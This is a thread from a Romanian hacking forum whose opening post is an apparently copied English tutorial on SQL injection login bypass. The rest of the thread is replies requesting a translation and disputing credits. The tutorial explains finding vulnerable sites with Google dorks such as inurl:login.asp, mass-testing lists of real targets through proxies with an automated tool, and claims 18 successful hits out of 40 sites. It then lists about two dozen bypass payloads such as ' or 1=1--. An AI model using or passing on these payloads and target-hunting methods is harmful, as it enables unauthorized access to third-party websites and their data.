Hacking and more...
HaCkinG CulT
Lista Forumurilor Pe Tematici
Hacking and more... | Reguli | Inregistrare | Login

POZE HACKING AND MORE...

Nu sunteti logat.
Nou pe simpatie:
Pisii la Simpatie.ro
Femeie
24 ani
Ialomita
cauta Barbat
24 - 44 ani
Hacking and more... / n00bs / SQL Injection Basic Tutorial Moderat de Shocker
Autor
Mesaj Pagini: 1
1o1
Little Kevin

Inregistrat: acum 17 ani
Postari: 46
One of the major problems with SQL is its poor security issues surrounding is the login and url strings.
this tutorial is not going to go into detail on why these string work as am not a coder i just know what i know and it works

SEARCH:

adminlogin.asp
login.asp

with these two search string you will have plenty of targets to chose from...finding one thats vulnerable is another question


WHAT I DO :

first let me go into details on how i go about my research

i have gathered plenty of injection strings for quite some time like these below and have just been granted access to a test machine and will be testing for many variations and new inputs...legally cool...provided by my good friend Gsecur aka ICE..also an Astal member.. "thanks mate" .. gives me a chance to concentrate on what am doing and not be looking over my shoulder

INJECTION STRINGS:HOW ?

this is the easiest part...very simple

on the login page just enter something like

user:admin (you dont even have to put this.)
pass:' or 1=1--

or

user:' or 1=1--
admin:' or 1=1--

some sites will have just a password so

password:' or 1=1--

infact i have compiled a combo list with strings like this to use on my chosen targets ....there are plenty of strings about , the list below is a sample of the most common used

there are many other strings involving for instance UNION table access via reading the error pages table structure
thus an attack with this method will reveal eventually admin UP paths...but thats another paper

the one am interested in are quick access to targets

PROGRAM

i tried several programs to use with these search strings and upto now only Ares has peformed well with quite a bit
of success with a combo list formatted this way,yesteday i loaded 40 eastern targets with 18 positive hits in a few minutes
how long would it take to go thought 40 sites cutting and pasting each string ??

combo example:

admin:' or a=a--
admin:' or 1=1--

and so on...it dont have to be admin can be anything you want... the most important part is example:' or 1=1-- this is our injection
string

now the only trudge part is finding targets to exploit...so i tend to search say google for login.asp or whatever

inurl:login.asp
index of:/admin/login.asp

like this: index of login.asp

result:


17,000 possible targets trying various searches spews out plent more


now using proxys set in my browser i then click through interesting targets...seeing whats what on the site pages if interesting
i then cut and paste url as a possible target...after an hour or so you have a list of sites of potential targets like so


and so on...in a couple of hours you can build up quite a list...reason i dont sellect all results or spider for login pages is
i want to keep the noise level low...my ISP.. well enough said...plus atm am on dial-up so to slow for me

i then save the list fire up Ares and enter (1) a proxy list (2)my target IP list (3)my combo list...start..now i dont want to go into
problems with users using Ares..thing is i know it works for me...

sit back and wait...any target vulnerable with show up in the hits box...now when it finds a target it will spew all the strings on that site as vulnerable...you have to go through each one on the site by cutting and pasting the string till you find the right one..but the thing is you know you CAN access the site ...really i need a program that will return the hit with a click on url and ignore false outputs

am still looking....thing is it saves quite a bit of time going to each site and each string to find its not exploitable.

there you go you should have access to your vulnerable target by now

another thing you can use the strings in the urls were user=? edit the url to the = part and paste ' or 1=1-- so it becomes

user=' or 1=1-- just as quick as login process


(Variations)

admin'--

' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

" or 0=0 #

or 0=0 #

' or 'x'='x

" or "x"="x

') or ('x'='x

' or 1=1--

" or 1=1--

or 1=1--

' or a=a--

" or "a"="a

') or ('a'='a

") or ("a"="a

hi" or "a"="a

hi" or 1=1 --

hi' or 1=1 --

hi' or 'a'='a

hi') or ('a'='a

hi") or ("a"="a

happy hunting


_______________________________________
Bag banii in el de forum! Care vrea sa facem un hack?!

pus acum 17 ani
   
Sad_Dreamer
Elite Member

Inregistrat: acum 17 ani
Postari: 1602
daca l-ai si traduce....te-as pupa :-)

_______________________________________
In caz ca nu sti...Getting Laid <> Getting r00t

pus acum 17 ani
   
1o1
Little Kevin

Inregistrat: acum 17 ani
Postari: 46
Poate o sa-l traduc , poate nu Oricum, astept kiss-u`

_______________________________________
Bag banii in el de forum! Care vrea sa facem un hack?!

pus acum 17 ani
   
3Nigma
Member of RedTeam

Inregistrat: acum 17 ani
Postari: 325
ma da-o draq...asta stiu ca-i copiat .... mi-aduc aminte cand cautam SQL injection pt server de Mu...asta am gasit...NO CREDITS

pus acum 17 ani
   
3Nigma
Member of RedTeam

Inregistrat: acum 17 ani
Postari: 325
oricum..bine ca l-a gasit cineva =D

pus acum 17 ani
   
1o1
Little Kevin

Inregistrat: acum 17 ani
Postari: 46
Pai si exploit-urile sunt copiate, toate tutorialele hackerilor sunt gasite si copiate....Deci, nu stiu daca e vreo problema

_______________________________________
Bag banii in el de forum! Care vrea sa facem un hack?!

pus acum 17 ani
   
Inside
Elite Member

Din: ..:: Angels City ::..
Inregistrat: acum 17 ani
Postari: 1351
ms frate.. dar daca lai traduce.. ar fi ceva

_______________________________________


pus acum 17 ani
   
1o1
Little Kevin

Inregistrat: acum 17 ani
Postari: 46
Offfff, poate o sa ma ocup la noapte de traducerea lui, dar voi nu stiti engleza?

_______________________________________
Bag banii in el de forum! Care vrea sa facem un hack?!

pus acum 17 ani
   
3Nigma
Member of RedTeam

Inregistrat: acum 17 ani
Postari: 325

1o1 a scris:

Pai si exploit-urile sunt copiate, toate tutorialele hackerilor sunt gasite si copiate....Deci, nu stiu daca e vreo problema


aici gresesti... pe forumul asta sunt destul oameni(f buni) sa  care sunt in stare de a veni ei insusi cu idei.E doar o chestie de perseverare si de rabdare!


pus acum 17 ani
   
Sad_Dreamer
Elite Member

Inregistrat: acum 17 ani
Postari: 1602
ca de exemplu DarthSion :-) dar tipu' are rabdare...nu inteleg cum reuseste :-)) la tutorialele pe care l-e copiatzi vedeti si voi..daca scrie pe undeva "CREDITS nick" copiatzi si chestia aia
btw la exploituri ... se vede foarte bine autorul...bineintzeles daca nu este hexat de altii cu nickurile lor si spun ca's facute de ei :-)


_______________________________________
In caz ca nu sti...Getting Laid <> Getting r00t

pus acum 17 ani
   
1o1
Little Kevin

Inregistrat: acum 17 ani
Postari: 46
Tutorialele sunt facute ca sa inveti. Deci nu cred ca are copyright, oricum, tutorialul asta il am pe calculator, de la cineva

_______________________________________
Bag banii in el de forum! Care vrea sa facem un hack?!

pus acum 17 ani
   
Pagini: 1  

Mergi la